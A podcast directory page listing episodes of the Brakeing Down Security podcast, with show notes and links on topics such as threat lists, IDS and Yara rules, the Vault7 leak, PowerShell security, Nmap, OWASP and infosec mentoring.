Brakeing Down Security Podcast

Rank #31 in Tech News category (Technology / News / Tech News)

Updated about 17 hours ago

A podcast all about the world of Security, Privacy, Compliance, and Regulatory issues that arise in today's workplace. Co-hosts Bryan Brake, Brian Boettcher, and Amanda Berlin teach concepts that aspiring Information Security Professionals need to know, or refresh the memories of the seasoned veterans.


iTunes Ratings: 79 ratings (average ratings breakdown: 68, 6, 4, 0, 1)

Great Security Pod

By The Drewsk - Oct 05 2018
Great security podcast even for non-security IT folks. Give it a listen!

Amazing!

By elliott2k - Jun 21 2017
I love the podcast and the community behind it. Much love! 10/10

Latest release on Jan 13, 2020

Rank #1: 2019-009- Log-MD story, Noid, communicating with Devs and security people-part1


Log-MD story (quick one) (you’ll like this one, Mr. Boettcher)

    SeaSec East meetup

    "Gabe"

https://www.sammamish.us/government/departments/information-technology/ransomware-attack-information-hub/

New Slack Moderator (@cherokeeJB)

Shoutout to “Jerry G”

Mike P on Slack: https://www.eventbrite.com/e/adversary-tactics-red-team-operations-training-course-dc-april-2019-tickets-54735183407

www.Workshopcon.com/events and that we're looking for BlueTeam trainers please

Any chance you can tag @workshopcon. SpecterOps and lanmaster53 when you post on Twitter and we'll retweet

Noid - @_noid_

noid23@gmail.com

Bsides Talk (MP3) - https://github.com/noid23/Presentations/blob/master/BSides_2019/Noid_Seattle_Bsides.mp3

Slides (PDF)

https://github.com/noid23/Presentations/blob/master/BSides_2019/Its%20Not%20a%20Bug%20Its%20a%20Feature%20-%20Seattle%20BSides%202019.pdf

Security view was a bit myopic?

“What do we win by playing?”

Cultivating relationships (buy lunch, donuts, etc)

Writing reports

Communicating findings that resonate with developers and management

    Often pentest reports are seen by various facets of folks

    Many levels of competency (incompetent -> super dev/sec)

Communicating risk? Making bugs make sense to everyone…

The three types of power:

https://www.manager-tools.com/2018/03/three-types-power-and-one-rule-them-part-1

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!: https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Mar 12 2019

51mins


Rank #2: 2017-002: Threat Lists, IDS/IPS rules, and mentoring


In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike.

But what if your company cannot afford such products, or is not ready to engage those types of companies, and still needs protection? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc.

We discuss some of the issues with using them, and how to use them in your #environment.

Lastly, we discuss #mentorship. A good mentor/mentee relationship can be mutually beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor...

RSS: www.brakeingsecurity.com/rss

Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3

iTunes:  https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2

YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE

----------

HITB announcement:

“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/

---------

Join our #Slack Channel! Sign up at https://brakesec.signup.team

#RSS: http://www.brakeingsecurity.com/rss

#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast

#SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback, or Suggestions? Contact us via Email: bds.podcast@gmail.com

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

#Player.FM: https://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

----------

Show Notes:

HANGOUTS:  https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme

2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring

  1. Threat Lists (didn’t have much time to research :/)
    1. THIS EXACTLY - http://blogs.gartner.com/anton-chuvakin/2014/01/28/threat-intelligence-is-not-signatures/
      1. Don’t use threat list feeds (by IP/domain) as threat intelligence
      2. Can use them for aggressive blocking, but don’t use them for alerting
    2. https://isc.sans.edu/suspicious_domains.html
    3. https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt
    4. http://iplists.firehol.org/
    5. https://zeltser.com/malicious-ip-blocklists/
    6. https://medium.com/@markarenaau/actionable-intelligence-is-it-a-capability-problem-or-does-your-intelligence-provider-suck-d8d38b1cbd25#.ncpmqp9cx
    7. Spamhaus: https://www.spamhaus.org/
    8. Leechers
  2. IDS/IPS rulesets
    1. Open rulesets - you can always depend on the kindness of strangers
      1. Advantage is that these are created by companies with worldwide reach
      2. Updated daily
      3. Good accompanying documentation
    2. You can buy large rulesets to use in your own IDS implementation
      1. Depends on your situation whether you want to go managed or do it yourself
      2. Regardless, you need to test them
    3. Managed security services will do this for you
    4. DIY
      1. I don’t recommend unless you have a team of dedicated people or you don’t care about getting hacked; signatures are way too dynamic, like trying to do AV sigs all by yourself
      2. Only a good idea for one-off, targeted attacks
  3. Yara rules
    1. https://securityintelligence.com/signature-based-detection-with-yara/
    2. http://yararules.com/
    3. http://resources.infosecinstitute.com/yara-simple-effective-way-dissecting-malware/
  4. InfoSec Mentoring
    1. For Mentors
      1. Set expectations & boundaries
      2. Find a good fit
      3. Be an active listener
      4. Keep open communication
      5. Schedule time
      6. Create homework
      7. Don’t assume technical level
    2. For Mentees
      1. Ask questions
      2. Do your own research
      3. Find a good fit
      4. Put forth effort
      5. It’s not the Mentor’s job to handhold; take responsibility for your own learning
      6. Value their time
      7. Come to each meeting with an agenda
    3. Mentoring frameworks?
  5. Podcasts (Courtesy of Ms. Hannelore)
    1. https://t.co/mLXjfF1HEr
    2. https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef0741

Jan 21 2017

1hr 5mins


Rank #3: Reconnaissance: Finding necessary info during a pentest


I had a healthy debate with Mr. Boettcher this week about the merits of doing recon for a pentest. Mr. Boettcher is a heavy duty proponent of it, and I see it as a necessary evil, but not one that I consider important.  We hash it out, and find some common ground this week.

People search links:

Spokeo - http://www.spokeo.com/

Pipl - https://pipl.com/

Sec Filings site: http://www.sec.gov/edgar/searchedgar/webusers.htm

Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com). Licensed under Creative Commons: By Attribution 3.0 http://creativecommons.org/licenses/by/3.0/

Aug 25 2014

48mins


Rank #4: 2016-015-Dr. Hend Ezzeddine, and changing organizational security behavior


Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-015-Dr._Hend_Ezzeddine_and_finding_security_training_that_works.mp3

iTunes Link: https://itunes.apple.com/us/podcast/2016-015-dr.-hend-ezzeddine/id799131292?i=366936677&mt=2

Dr. Ezzeddine's slides from Bsides Austin (referenced during the interview): https://drive.google.com/file/d/0B-qfQ-gWynwiQnBXMnJVeko4M25pdk1Sa0JnMGJrZmltWlRr/view?usp=sharing

You open the flash animation, click click click, answer 10 security questions that your 5 year old could answer, get your certificate of completion... congratulations, you checked the compliance box...

But what did you learn in that training? If you can't remember the next day, maybe it's because the training failed to resonate with you?

Have you ever heard a red team #pentester say that the weakest link in any business is not the applications, or the hardware, but the people? If they can't find a vulnerability, the last vulnerability is the people. One email with a poisoned .docx, and you have a shell into a system...

Targeted trainings, and the use of certain styles of #training (presentations, in-person, hand puppets, etc.) can be more effective for certain groups. Also, certain groups should have training based on the threats they might be susceptible to...

Dr. Hend #Ezzeddine came by this week to discuss how she helps #organizations get people to understand security topics and concepts, to create a positive security culture. Maybe even a culture that will not click on that attachment...

If you are planning on attending "Hack In The Box" in Amsterdam, The Netherlands on 23-27 May 2016, you can receive a 10% discount by entering 'brakesec' at checkout.

Get more information at the "Hack In The Box" conference by visiting:

http://conference.hitb.org/hitbsecconf2016ams/

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security using Patreon: https://www.patreon.com/bds_podcast

RSS FEED: http://www.brakeingsecurity.com/rss

On #Twitter: @brakesec @boettcherpwned @bryanbrake @hackerhurricane

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

Google Play Store: https://play.google.com/music/podcasts/portal/#p:id=playpodcast/series&a=100584969

Player.FM: https://player.fm/series/brakeing-down-security-podcast

Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

Apr 16 2016

1hr 10mins


Rank #5: 2015-022: SANS Top 25 Critical Security Controls-#10 and #11


When you're working with network infrastructure, there's a real need for proper configuration management, as well as having a proper baseline to work from.

Mr. Boettcher and I continue through the SANS Top 25 Critical Security Controls. #10 and #11 both deal with network infrastructure: proper patching and secure baselines, so that you are as secure as possible. Your company's ideal security structure needs to be a 'brick', not an 'egg'.

May 17 2015

56mins


Rank #6: 2017-009-Dave Kennedy talks about CIAs 'Vault7', ISC2, and Derbycon updates!


Wikileaks published a cache of documents and information from what appears to be a wiki from the Central Intelligence Agency (CIA).

This week, we discuss the details of the leak (as of 11Mar 2017), and how damaging it is to blue teamers.

To help us, we asked Mr. Dave Kennedy (@hackingDave) to sit down with us and discuss what he found, and his opinions of the data that was leaked. Mr. Kennedy is always a great interview, and his insights are now regularly seen on Fox Business News, CNN, and MSNBC.

Dave isn't one to rest on his laurels. Many of you know him as the co-organizer of #derbycon, as well as a board member of #ISC2. We ask him about initiatives going on with ISC2, and how you (whether or not you're an ISC2 cert holder) can help with various committees and with improving the certification landscape. We talk about how to get involved.

We finish up asking about the latest updates to DerbyCon, as well as the dates of tickets, and we talk about our CTF for a free ticket to DerbyCon.

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-009-dave_kennedy_vault7_isc2_derbycon_update.mp3

Youtube:  https://www.youtube.com/watch?v=lqXGGg7-BlM

iTunes: https://itunes.apple.com/us/podcast/2017-009-dave-kennedy-talks-abotu-cias-vault7-isc2/id799131292?i=1000382638971&mt=2

#Bsides #London is accepting a Call for Papers (#CFP) starting 14 February 2017, as well as a Call for Workshops. Tickets are currently sold out, but there will be other chances for tickets. Follow @bsidesLondon for more information. You can find out more at https://www.securitybsides.org.uk/

CFP closes 27 March 2017

------


iHeartRadio App:  https://www.iheart.com/show/263-Brakeing-Down-Securi/

SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake

#Player.FM: https://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

--show notes--

http://www.bbc.com/news/world-us-canada-10758578

WL: “CIA ‘hoarded’ vulnerabilities or ‘cyber-weapons’”

    Should they not have tools that allow them to infiltrate systems of ‘bad’ people?

    Promises to share information with manufacturers

        BrBr- Manufacturers and devs are the reason the CIA has ‘cyber-weapons’

            Shit code, poor software design/architecture

            Security wonks aren’t without blame here either

http://www.bbc.com/news/technology-39218393  -RAND report

        Report suggested stockpiling is ‘good’

            “On the other hand, publicly disclosing a vulnerability that isn't known by one's adversaries gives them the upper hand, because the adversary could then protect against any attack using that vulnerability, while still keeping an inventory of vulnerabilities of which only it is aware of in reserve.”

Encryption does still work, in many cases… as it appears they are having to intercept the data before it makes it into secure messaging systems…  

http://abcnews.go.com/Technology/wireStory/cia-wikileaks-dump-tells-us-encryption-works-46045668

(somewhat relevant? Not sure if you want to touch on https://twitter.com/bradheath/status/837846963471122432/photo/1)

Wikileaks - more harm than good?

    Guess that depends on what side you’re on

    What side is Assange on? (his own side?)

    Media creates FUD because they don’t understand

        Secure messaging apps busted (fud inferred by WL)

            In fact, data is circumvented before encryption is applied.

Some of the docs make you wonder about the need for ‘over-classification’

Vulnerabilities uncovered

Samsung Smart TVs “Fake-Off”

Tools to exfil data off of iDevices

    BrBr- Cellebrite has sold that for years to the FBI

        CIA appears to only have up to iOS 9 (according to docs released)

Car hacking tech

Sandbox detection (notices mouse clicks or the lack of them)

    Reported by eEye: https://wikileaks.org/ciav7p1/cms/page_2621847.html

Technique: Process Hollowing: https://wikileaks.org/ciav7p1/cms/page_3375167.html

    Not new: https://attack.mitre.org/wiki/Technique/T1093

anything Mr. Kennedy feels is important to mention

What can blue teamers do to protect themselves?

    Take an accounting of ‘smart devices’ in your workplace

        Educate users on not bringing smart devices to work

            And at home (if they are remote)

                Alexa,

        Restrict smart devices in sensitive areas

            SCIFs, conference rooms, even in ‘open workplace’ areas

    Segment possibly affected systems from the internet

    Keep proper inventories of software used in your environment

    Modify IR exercises to allow for this type of scenario?

    Reduce ‘smart’ devices

        Grab that drill and modify the TV in the conference room

        Cover the cameras on TV

            Is that too paranoid?

        Don’t set up networking on smart devices or use cloud services on ‘smart’ devices

    Remind devs that unpatched or crap code can become the next ‘cyber-weapon’ ;)

Mar 14 2017

1hr 15mins


Rank #7: 2015-023_Get to know a Security Tool: Security Onion!


Making your network more secure by deploying tools is no easy task. This week, we show you a tool, Security Onion, that can give you an IDS and a log analysis tool in less than 20 minutes.

http://blog.securityonion.net/p/securityonion.html

May 26 2015

37mins


Rank #8: 2017-042-Jay beale, Hushcon, Apple 0Day, and BsidesWLG audio


Ms. Berlin and Mr. Boettcher are on holiday this week, and I (Bryan) went to Hushcon (www.hushcon.com) last week (8-9 Dec 2017). Lots of excellent discussion and talks.

While there, our friend Jay Beale (@jaybeale) came on to discuss Hushcon, as well as some recent news. 

Google released an 0day for Apple iOS, and we talk about how jailbreaking repos seem to be shuttering, because there have not been as many vulns found to allow for jailbreaking iDevices.

We also went back and discussed some highlights of the DFIR hierarchy show last week (https://brakesec.com/2017-041) and some of the real world examples of someone who has seen it on a regular basis. Jay's insights are something you shouldn't miss.

Finally, Ms. Berlin went to New Zealand and gave a couple of talks at Bsides Wellington (@bsideswlg). She interviewed Chris Blunt (https://twitter.com/chrisblunt) and "Olly the Ninja" (https://twitter.com/Ollytheninja) about what makes a good con. 

Direct Link: https://brakesec.com/2017-042

*NEW* we are now on Spotify!: https://brakesec.com/spotifyBDS

RSS: https://brakesec.com/BrakesecRSS

Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

Join our #Slack Channel! Sign up at https://brakesec.com/Dec2017BrakeSlack or DM us on Twitter, or email us.

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM: https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

From our friends at Hack In the Box Amsterdam:

"We are gearing up for the Hack In The Box Amsterdam 2018, which is now on its 9th edition, and will take place between the 9th and 13th April at the same venue as last year, the Grand Krasnapolsky hotel in the center of Amsterdam: https://conference.hitb.org/hitbsecconf2018ams/ The list of trainings is already published and looking as awesome as ever: https://conference.hitb.org/hitbsecconf2018ams/training .  The CFP is open and the review board is already hard at work with the first submissions."     "If you have an interesting security talk and fancy visiting Amsterdam in the spring, then submit your talk to the Hack In The Box Amsterdam conference, which will take place between 9 and 13 April 2018. The Call For Papers is open until the end of December, submission details can be found at https://cfp.hackinthebox.org/. Tickets are already on sale, with early bird prices until December 31st. And the 'brakeingsecurity' discount code gets you a 10% discount".

--Show Notes--

https://github.com/int0x80/githump

http://ptrarchive.com/

https://hunter.io/

https://www.data.com/

https://techcrunch.com/2017/11/27/ios-jailbreak-repositories-close-as-user-interest-wanes/

https://securelist.com/unraveling-the-lamberts-toolkit/77990/

Dec 16 2017

1hr 6mins


Rank #9: 2016-021: Carbon Black's CTO Ben Johnson on EDR, the layered approach, and threat intelligence


Ben Johnson (@chicagoben on Twitter) has spent a good deal of time protecting clients' endpoints, from his work at the NSA to co-founding Carbon Black (@carbonblack_inc).

We managed to have him on to discuss EDR (#Endpoint Detection and Response), TTPs (#Tactics, Techniques, and Procedures), and the #Threat #Intelligence industry.

Ben discusses with us the Layered Approach to EDR:

1. Hunting

2. Automation

3. Integration

4. Retrospection

5. Patterns of Attack/Detection

6. Indicator-based detection

7. Remediation

8. Triage

9. Visibility

We also discuss how VirusTotal's changes in policy regarding the sharing of information are going to affect the threat intel industry.

Ben also discusses his opinion of our "Moxie vs. Mechanisms" podcast, where businesses spend too much on shiny boxes vs. people.

Brakesec apologizes for the audio issues during minute 6 and minute 22. Google Hangouts was not kind to us :(

Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-021-Ben_Johnson-Carbon_black-Threat_intelligence.mp3

iTunes: https://itunes.apple.com/us/podcast/2016-021-carbon-blacks-cto/id799131292?i=1000369579669&mt=2

YouTube: https://youtu.be/I10R3BeGDs4

RSS: http://www.brakeingsecurity.com/rss

Show notes: https://docs.google.com/document/d/12Rn-p1u13YlmOORTYiM5Q2uKT5EswVRUj4BJVX7ECHA/edit?usp=sharing (great info)

https://roberthurlbut.com/blog/make-threat-modeling-work-oreilly-2016

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast on Patreon: https://www.patreon.com/bds_podcast

#Twitter: @brakesec @boettcherpwned @bryanbrake

#Facebook: https://www.facebook.com/BrakeingDownSec/

#Tumblr: http://brakeingdownsecurity.tumblr.com/

Player.FM: https://player.fm/series/brakeing-down-security-podcast

#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr

#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

May 29 2016

57mins


Rank #10: 2019-038- Ethical dilemmas with offensive tools, powershell discussion with Lee Holmes - Part2


Derbycon9 talk - PowerShell Security Looking Back from the Inside - https://www.youtube.com/watch?v=DYWPtt7qszY&list=PLNhlcxQZJSm_ZDJBksg97I5q1XsdQcyN5&index=27&t=0s

Encarta - https://en.wikipedia.org/wiki/Encarta

Scott Hanselman’s twitter thread about Encarta: https://twitter.com/shanselman/status/1158780839464849409

Congrats on the black badge :)

I like that you bring up execution policies, and that it was never created to become a security control.

  • I started alerting on it anyway, at least from non-admin devices

https://www.mssqltips.com/sqlservertip/2702/setting-the-powershell-execution-policy/

Want to learn Powershell? UnderTheWire wargame: https://underthewire.tech/

Jeffrey Snover “The Cultural battle to remove Windows from Windows Server”: https://www.youtube.com/watch?v=3Uvq38XOark

You talk about “why would anyone want to remove powershell”, as it came as a standalone download and part of the Windows SDK. I was taught, when I was just getting into tech, that I should fear powershell, and because of that I didn’t realize how powerful it could be as an admin.

Powershell slime trail <3 (powershell transparency)

“You can’t force a powerful tool only to be used how you want it to be used, you can tilt the playing field on behalf of defenders”

If an attacker is going to use powershell, let’s make them regret it

Powershell has had quite an impact and history.

My own sorry logging/alerting attempts

You mentioned the amount of attacks listed in MITRE that use powershell, is that *the* recommended resource for blue teamers, are there any others?

Revoke-Obfuscation white paper (blackhat2017): https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf

https://github.com/danielbohannon/Invoke-Obfuscation

https://github.com/danielbohannon/Revoke-Obfuscation

https://blog.trendmicro.com/trendlabs-security-intelligence/ransomware-now-uses-windows-powershell/

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TROJ_POSHCODER.A

Ever thought of writing a powershell security-centric book? Bill Pollock was looking for someone to write a book for NoStarch…

Derbycon keynote with Lee Holmes and Jeffrey Snover - http://www.irongeek.com/i.php?page=videos/derbycon6/101-key-note-jeffrey-snover-lee-holmes

AMSI - Antimalware Scan Interface: https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal

https://www.amazon.com/dp/B00ARN9MEK/ref=dp-kindle-redirect?_encoding=UTF8&btkr=1 -  Windows Powershell cookbook

Eric conrad: https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html

https://github.com/sans-blue-team/DeepBlueCLI

Daniel Bohannon - DevSec Defense - https://www.youtube.com/watch?v=QJe8xikf-iE

https://github.com/psconfeu/2018/tree/master/Daniel%20Bohannon/DevSec%20Defense

Constrained language mode: https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/

Maslow’s security Hierarchy: https://www.leeholmes.com/blog/2014/12/08/maslows-hierarchy-of-security-controls/

Just Enough Administration: https://docs.microsoft.com/en-us/previous-versions//dn896648(v=technet.10)?redirectedfrom=MSDN

https://github.com/infosecn1nja/AD-Attack-Defense

Also - DrawOnMyBadge.com - Super cool idea, loved the mona lisa

@Lee_Holmes

@hackershealth

@log-md

@infosecCampout

@seasecEast

@brakesec

@bryanbrake

@boettcherpwned

@Infosystir

@packscott

@dpcybuck

@megan_roddie

@consultingCSO

Oct 22 2019

52mins


Rank #11: Episode 3 - Alerts, Events, and a bit of incident response


In this episode, we talk about upcoming podcasts with Michael Gough from MI2 Security discussing malware, and this week we get into everything about alerts: why they are important, types of alerts, levels that can occur, and even a bit of incident response in handling alerts.

Intro "Private Eye" and Outro "Honeybee" created by Kevin MacLeod (incompetech.com). Licensed under Creative Commons: By Attribution 3.0 http://creativecommons.org/licenses/by/3.0/

Jan 27 2014

33mins


Rank #12: OWASP Top Ten: Numbers 6 - 10


As we wade through the morass of the Infosec swamp, we come across the OWASP 2013 report of web app vulnerabilities. Since Mr. Boettcher and I find ourselves often attempting to explain these kinds of issues to people on the Internet and in our daily lives, we thought it would be prudent to help shed some light on these.

So this week, we discuss the lower of the top 10, the ones that aren't as glamorous or as earth shaking as XSS or SQLI, but are gotchas that will bite thine ass just as hard.

Next week is the big ones, the Top 5... all your favorites, in one place!

OWASP Top 10 (2013) PDF:  http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013.pdf

Costs of finding web defects early (2008): http://www.informit.com/articles/article.aspx?p=1193473&seqNum=6

 

Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com). Licensed under Creative Commons: By Attribution 3.0 http://creativecommons.org/licenses/by/3.0/

Jun 16 2014

45mins


Rank #13: OWASP Top Ten: 1-5


We finished up the OWASP Top Ten List. We discussed Injection, XSS, and other goodness.  Find out what makes the Top 5 so special.

http://risky.biz/fss_idiots  - Risky Business Interview concerning Direct Object Reference and First State Superannuation

http://oauth.net/2/ - Great information on OAUTH 2.0.

 

Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com). Licensed under Creative Commons: By Attribution 3.0 http://creativecommons.org/licenses/by/3.0/

Jun 23 2014

49mins


Rank #14: 2019-008-windows retpoline patches, PSremoting, underthewire, thunderclap vuln


BrakeingDownIR show #10

GrumpySec appearance?

https://support.microsoft.com/en-us/help/4482887/windows-10-update-kb4482887

https://techcommunity.microsoft.com/t5/Windows-Kernel-Internals/Mitigating-Spectre-variant-2-with-Retpoline-on-Windows/ba-p/295618

https://blogs.technet.microsoft.com/srd/2018/03/15/mitigating-speculative-execution-side-channel-hardware-vulnerabilities/

“Microsoft has added support for the /Qspectre flag to Visual C++ which currently enables some narrow compile-time static analysis to identify at-risk code sequences related to CVE-2017-5753 and insert speculation barrier instructions. This flag has been used to rebuild at-risk code in Windows and was released with our January 2018 security updates. It is important to note, however, that the Visual C++ compiler cannot guarantee complete coverage for CVE-2017-5753 which means instances of this vulnerability may still exist.”

Retpoline = “Return Trampoline”

    “That’s because when using return operations, any associated speculative execution will 'bounce' endlessly.”

https://www.tomshardware.com/news/retpoline-patch-spectre-windows-10,37958.html

Cool site (Andrei) *long time podcast supporter*

UndertheWire.tech - powershell wargame

---

PSRemoting - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-6

https://www.howtogeek.com/117192/how-to-run-powershell-commands-on-remote-computers/

https://blogs.technet.microsoft.com/askperf/2012/02/17/useful-wmic-queries/

Caveats: Network connection you’re on must be set to “private”, not public

WinRM service has to be enabled on both the local and remote hosts (at least, I think so --brbr)

https://www.engadget.com/2019/02/27/dow-jones-watchlist-leaked/

http://time.com/5349896/23andme-glaxo-smith-kline/

http://thunderclap.io/

https://int3.cc/products/facedancer21 -  USB

Check out our Store on Teepub! https://brakesec.com/store

Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com

#Brakesec Store!:https://www.teepublic.com/user/bdspodcast

#Spotify: https://brakesec.com/spotifyBDS

#RSS: https://brakesec.com/BrakesecRSS

#Youtube Channel:  http://www.youtube.com/c/BDSPodcast

#iTunes Store Link: https://brakesec.com/BDSiTunes

#Google Play Store: https://brakesec.com/BDS-GooglePlay

Our main site:  https://brakesec.com/bdswebsite

#iHeartRadio App:  https://brakesec.com/iHeartBrakesec

#SoundCloud: https://brakesec.com/SoundcloudBrakesec

Comments, Questions, Feedback: bds.podcast@gmail.com

Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon

https://brakesec.com/BDSPatreon

#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir

#Player.FM : https://brakesec.com/BDS-PlayerFM

#Stitcher Network: https://brakesec.com/BrakeSecStitcher

#TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Mar 04 2019

56mins

Rank #15: Introduction to Nmap, Part 2

Here is Part 2 of our video for understanding the basics of Nmap.  I discuss some of the logging output, the scripts found in Nmap, and the output that Nmap gives you for reporting or comparison later.

I really did want to go more into the Lua portion of the scripting engine, and perhaps make a simple script, but time constraints halted that. I hope to get more adept at video creation and hopefully editing, to make a more concise video tutorial.

Nmap target specifications: http://nmap.org/book/man-target-specification.html

http://nmap.org/book/nse-usage.html

Explanation of all Nmap scripts: http://nmap.org/nsedoc/

nmap icon courtesy of insecure.org

Aug 10 2014

19mins

Rank #16: the last Derbycon Brakesec podcast

This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, and Gary Rimar (piano player extraordinaire) talks about @litmoose's talk on how to tell C-Levels that their applications aren't good.

We also got asked about how the show came about, and how we found each other.

Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...

Sep 07 2019

50mins

Rank #17: Episode 9: Framework for Improving Critical Infrastructure Cybersecurity

This week, we got into some discussion about frameworks, and the different types of frameworks available (regulatory, "best practice", and process improvement).

We also looked at the new "Framework for Improving Critical Infrastructure Cybersecurity" ratified and released last month.

Does it meet with our high expectations? You'll just have to listen and find out.

http://www.nist.gov/cyberframework/

Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/

Mar 24 2014

33mins

Rank #18: 2017-004-sandboxes, jails, chrooting, protecting applications, and analyzing malware

This week, we discuss sandboxing technologies. Most of the time, infosec people use sandboxes and similar technology for analyzing malware and other malicious software.

Developers use them to add protections to their applications, or even to build defenses that ward off potential attack vectors.

We discuss sandboxes and sandboxing technology, jails, chrooting of applications, and even tools that keep applications honest, in particular the pledge(2) system call in OpenBSD.

----------

HITB announcement:

“Tickets for attendance and training are on sale, and entering special code 'brakeingsecurity' at checkout gets you a 10% discount.” Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/

---------

 Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-004-Sandboxing_technology.mp3

iTunes: https://itunes.apple.com/us/podcast/2017-004-sandboxes-jails-chrooting/id799131292?i=1000380833781&mt=2

YouTube: https://www.youtube.com/watch?v=LqMZ9aGzYXA

Join our #Slack Channel! Sign up at https://brakesec.signup.team

#RSS: http://www.brakeingsecurity.com/rss

#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast

#SoundCloud: https://www.soundcloud.com/bryan-brake

Comments, Questions, Feedback, or Suggestions? Contact us via Email: bds.podcast@gmail.com

